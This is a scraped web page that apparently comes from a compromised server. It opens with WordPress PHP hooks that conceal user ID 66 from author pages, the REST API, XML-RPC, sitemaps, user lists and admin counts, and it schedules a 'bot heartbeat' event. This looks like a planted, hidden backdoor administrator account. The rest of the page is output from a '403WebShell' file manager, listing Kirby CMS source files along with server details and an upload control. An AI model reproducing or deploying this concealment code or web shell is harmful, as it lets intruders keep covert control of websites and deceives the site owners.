add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / var /www /html /zukuenfte.net /kirby /src /Cms / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
June 03 2025 09:52:03
www-data / www-data
0755
Auth
--
June 03 2025 09:52:03
www-data / www-data
0755
System
--
June 03 2025 09:52:03
www-data / www-data
0755
Api.php
5.893 KB
June 03 2025 09:52:03
www-data / www-data
0644
App.php
40.946 KB
June 03 2025 09:52:03
www-data / www-data
0644
AppCaches.php
2.957 KB
June 03 2025 09:52:03
www-data / www-data
0644
AppErrors.php
5.292 KB
June 03 2025 09:52:03
www-data / www-data
0644
AppPlugins.php
20.269 KB
June 03 2025 09:52:03
www-data / www-data
0644
AppTranslations.php
4.364 KB
June 03 2025 09:52:03
www-data / www-data
0644
AppUsers.php
2.993 KB
June 03 2025 09:52:03
www-data / www-data
0644
Auth.php
24.825 KB
June 03 2025 09:52:03
www-data / www-data
0644
Block.php
4.903 KB
June 03 2025 09:52:03
www-data / www-data
0644
BlockConverter.php
5.687 KB
June 03 2025 09:52:03
www-data / www-data
0644
Blocks.php
3.513 KB
June 03 2025 09:52:03
www-data / www-data
0644
Blueprint.php
19.873 KB
June 03 2025 09:52:03
www-data / www-data
0644
Collection.php
8.394 KB
June 03 2025 09:52:03
www-data / www-data
0644
Collections.php
2.889 KB
June 03 2025 09:52:03
www-data / www-data
0644
ContentLock.php
4.444 KB
June 03 2025 09:52:03
www-data / www-data
0644
ContentLocks.php
5.026 KB
June 03 2025 09:52:03
www-data / www-data
0644
Core.php
14.242 KB
June 03 2025 09:52:03
www-data / www-data
0644
Email.php
6.687 KB
June 03 2025 09:52:03
www-data / www-data
0644
Event.php
5.044 KB
June 03 2025 09:52:03
www-data / www-data
0644
Fieldset.php
4.763 KB
June 03 2025 09:52:03
www-data / www-data
0644
Fieldsets.php
2.474 KB
June 03 2025 09:52:03
www-data / www-data
0644
File.php
14.931 KB
June 03 2025 09:52:03
www-data / www-data
0644
FileActions.php
11.499 KB
June 03 2025 09:52:03
www-data / www-data
0644
FileBlueprint.php
6.563 KB
June 03 2025 09:52:03
www-data / www-data
0644
FileModifications.php
4.877 KB
June 03 2025 09:52:03
www-data / www-data
0644
FilePermissions.php
0.463 KB
June 03 2025 09:52:03
www-data / www-data
0644
FilePicker.php
1.656 KB
June 03 2025 09:52:03
www-data / www-data
0644
FileRules.php
8.888 KB
June 03 2025 09:52:03
www-data / www-data
0644
FileVersion.php
2.159 KB
June 03 2025 09:52:03
www-data / www-data
0644
Files.php
3.925 KB
June 03 2025 09:52:03
www-data / www-data
0644
Find.php
4.203 KB
June 03 2025 09:52:03
www-data / www-data
0644
HasChildren.php
3.832 KB
June 03 2025 09:52:03
www-data / www-data
0644
HasFiles.php
3.462 KB
June 03 2025 09:52:03
www-data / www-data
0644
HasMethods.php
1.432 KB
June 03 2025 09:52:03
www-data / www-data
0644
HasSiblings.php
3.624 KB
June 03 2025 09:52:03
www-data / www-data
0644
Helpers.php
4.993 KB
June 03 2025 09:52:03
www-data / www-data
0644
Html.php
3.85 KB
June 03 2025 09:52:03
www-data / www-data
0644
Ingredients.php
1.52 KB
June 03 2025 09:52:03
www-data / www-data
0644
Item.php
2.114 KB
June 03 2025 09:52:03
www-data / www-data
0644
Items.php
2.111 KB
June 03 2025 09:52:03
www-data / www-data
0644
Language.php
12.863 KB
June 03 2025 09:52:03
www-data / www-data
0644
LanguageRouter.php
3.585 KB
June 03 2025 09:52:03
www-data / www-data
0644
LanguageRoutes.php
3.55 KB
June 03 2025 09:52:03
www-data / www-data
0644
LanguageRules.php
1.954 KB
June 03 2025 09:52:03
www-data / www-data
0644
LanguageVariable.php
2.91 KB
June 03 2025 09:52:03
www-data / www-data
0644
Languages.php
1.933 KB
June 03 2025 09:52:03
www-data / www-data
0644
Layout.php
1.863 KB
June 03 2025 09:52:03
www-data / www-data
0644
LayoutColumn.php
2.186 KB
June 03 2025 09:52:03
www-data / www-data
0644
LayoutColumns.php
0.441 KB
June 03 2025 09:52:03
www-data / www-data
0644
Layouts.php
2.169 KB
June 03 2025 09:52:03
www-data / www-data
0644
License.php
11.979 KB
June 03 2025 09:52:03
www-data / www-data
0644
LicenseStatus.php
2.793 KB
June 03 2025 09:52:03
www-data / www-data
0644
LicenseType.php
2.15 KB
June 03 2025 09:52:03
www-data / www-data
0644
Loader.php
4.673 KB
June 03 2025 09:52:03
www-data / www-data
0644
Media.php
4.721 KB
June 03 2025 09:52:03
www-data / www-data
0644
Model.php
1.911 KB
June 03 2025 09:52:03
www-data / www-data
0644
ModelPermissions.php
2.742 KB
June 03 2025 09:52:03
www-data / www-data
0644
ModelWithContent.php
19.686 KB
June 03 2025 09:52:03
www-data / www-data
0644
Nest.php
1.038 KB
June 03 2025 09:52:03
www-data / www-data
0644
NestCollection.php
0.623 KB
June 03 2025 09:52:03
www-data / www-data
0644
NestObject.php
0.739 KB
June 03 2025 09:52:03
www-data / www-data
0644
Page.php
28.754 KB
June 03 2025 09:52:03
www-data / www-data
0644
PageActions.php
25.483 KB
June 03 2025 09:52:03
www-data / www-data
0644
PageBlueprint.php
4.398 KB
June 03 2025 09:52:03
www-data / www-data
0644
PagePermissions.php
1.177 KB
June 03 2025 09:52:03
www-data / www-data
0644
PagePicker.php
5.187 KB
June 03 2025 09:52:03
www-data / www-data
0644
PageRules.php
13.001 KB
June 03 2025 09:52:03
www-data / www-data
0644
PageSiblings.php
2.742 KB
June 03 2025 09:52:03
www-data / www-data
0644
Pages.php
10.172 KB
June 03 2025 09:52:03
www-data / www-data
0644
Pagination.php
3.553 KB
June 03 2025 09:52:03
www-data / www-data
0644
Permissions.php
4.738 KB
June 03 2025 09:52:03
www-data / www-data
0644
Picker.php
3.262 KB
June 03 2025 09:52:03
www-data / www-data
0644
Plugin.php
7.824 KB
June 03 2025 09:52:03
www-data / www-data
0644
PluginAsset.php
2.086 KB
June 03 2025 09:52:03
www-data / www-data
0644
PluginAssets.php
4.451 KB
June 03 2025 09:52:03
www-data / www-data
0644
R.php
0.416 KB
June 03 2025 09:52:03
www-data / www-data
0644
Responder.php
8.173 KB
June 03 2025 09:52:03
www-data / www-data
0644
Response.php
0.597 KB
June 03 2025 09:52:03
www-data / www-data
0644
Role.php
3.208 KB
June 03 2025 09:52:03
www-data / www-data
0644
Roles.php
3.298 KB
June 03 2025 09:52:03
www-data / www-data
0644
S.php
0.419 KB
June 03 2025 09:52:03
www-data / www-data
0644
Search.php
1.172 KB
June 03 2025 09:52:03
www-data / www-data
0644
Section.php
1.872 KB
June 03 2025 09:52:03
www-data / www-data
0644
Site.php
10.122 KB
June 03 2025 09:52:03
www-data / www-data
0644
SiteActions.php
2.25 KB
June 03 2025 09:52:03
www-data / www-data
0644
SiteBlueprint.php
1.167 KB
June 03 2025 09:52:03
www-data / www-data
0644
SitePermissions.php
0.327 KB
June 03 2025 09:52:03
www-data / www-data
0644
SiteRules.php
1.303 KB
June 03 2025 09:52:03
www-data / www-data
0644
Structure.php
1.227 KB
June 03 2025 09:52:03
www-data / www-data
0644
StructureObject.php
1.827 KB
June 03 2025 09:52:03
www-data / www-data
0644
System.php
11.224 KB
June 03 2025 09:52:03
www-data / www-data
0644
Translation.php
2.752 KB
June 03 2025 09:52:03
www-data / www-data
0644
Translations.php
1.274 KB
June 03 2025 09:52:03
www-data / www-data
0644
Url.php
2.301 KB
June 03 2025 09:52:03
www-data / www-data
0644
User.php
16.831 KB
June 03 2025 09:52:03
www-data / www-data
0644
UserActions.php
10.048 KB
June 03 2025 09:52:03
www-data / www-data
0644
UserBlueprint.php
1.052 KB
June 03 2025 09:52:03
www-data / www-data
0644
UserPermissions.php
1.234 KB
June 03 2025 09:52:03
www-data / www-data
0644
UserPicker.php
1.363 KB
June 03 2025 09:52:03
www-data / www-data
0644
UserRules.php
9.518 KB
June 03 2025 09:52:03
www-data / www-data
0644
Users.php
3.638 KB
June 03 2025 09:52:03
www-data / www-data
0644
Visitor.php
0.44 KB
June 03 2025 09:52:03
www-data / www-data
0644
Youez - 2016 - github.com/yon3zuLinuXploit